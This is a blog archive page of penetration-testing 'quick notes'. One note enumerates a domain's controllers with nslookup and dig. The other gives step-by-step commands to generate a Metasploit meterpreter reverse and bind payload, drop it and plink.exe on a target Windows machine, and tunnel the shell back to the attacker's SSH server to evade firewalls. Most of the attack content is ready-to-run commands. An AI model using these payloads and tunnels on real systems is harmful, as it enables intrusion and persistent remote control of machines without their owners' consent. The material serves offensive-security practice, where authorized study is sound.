Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011 § Leave a comment

Scenario:

Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine) 

  1. Open your linux shell

Using Nslookup

nslookup
set type=srv
_ldap._tcp.dc._msdcs.hacking.lab.local

Using Dig (Display a list of domain controllers )

dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local | egrep -v '(;;)'|cut -d" " -f8 | awk NF

References:

Verify DNS registration for DC using nslookuphttp://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat)https://github.com/nullbind/Other-Projects/tree/master/GDA

Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011 § Leave a comment

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you try to upload your meterpreter payload and runs it the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe
  1. Drop msf.exe on your target
  2. Drop plink.exe on your target (plink version from quest putty)
  3. Set up a msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j
  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connecting to the ssh server and setting up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444
  1. Start msf.exe

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Sessionhttp://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTYhttp://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:


##attacker##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ###

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:


##attacker###

msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

##target##

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444

Where Am I?

You are currently viewing the archives for December, 2011 at hdesser.

Follow

Get every new post delivered to your Inbox.